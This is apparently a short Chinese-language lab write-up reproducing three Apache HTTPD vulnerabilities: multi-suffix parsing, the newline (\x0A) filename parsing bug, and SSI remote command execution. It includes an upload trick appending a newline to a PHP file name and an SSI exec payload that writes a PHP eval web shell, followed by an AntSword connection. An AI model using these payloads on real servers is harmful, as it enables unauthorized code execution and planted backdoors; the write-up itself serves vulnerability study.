Apache HTTPD 多后缀解析漏洞
由于管理员启用了错误的配置文件导致文件被解析。
以下配置会导致文件后缀中有.php的就会被当作php文件来解析
测试:
上传一个jpg格式的文件
访问看看:
发现php代码被解析
Apache HTTPD 换行解析漏洞(2.4.0~2.4.29)
尝试上传php文件
在1.php后添加\x0A,再次尝试上传文件:
访问1.php%0a:
成功
Apache SSI 远程命令执行漏洞
shtml是标准通用标记语言下的一个应用,包含有嵌入式服务器方包含命令的文本,在被传送给浏览器之前,服务器会对SHTML文档进行完全地读取、分析以及修改。
SSI:服务器端嵌入或者叫服务器端包含,是Server Side Include的简写。SSI技术通过在文档中加入SSI指令,让服务器端在输出文档之前解析SSI指令,并把解析完的结果和文档一同输出给客户端。
SSI的指令格式为:<!-- #directive parameter=“value” -->
其中,directive是指令名,parameter指令参数,value指令参数值
可以看到,就是html注释,事实上,Web服务器开启了SSI,并且页面包含可以解析的指令,那么Web服务器就解析这个指令。没开启器SSI或者开启了SSI,但是不是可以解析的指令,那么都当做注释。
注意的是,“#”要和directive连在一起,中间不能含有空格
SSI包含的指令有
config:修改 SSI 的默认设置
echo:显示环境变量
exec:执行 CGI 脚本
flastmod :显示指定文件的最后修改日期
fsize:显示指定文件的大小
include:把其它文档插入到当前被解析的文档中
这是使用的payload是:
<!--#exec cmd="echo '<?php eval($_POST[a]); ?>'>>1.php" -->
蚁剑连接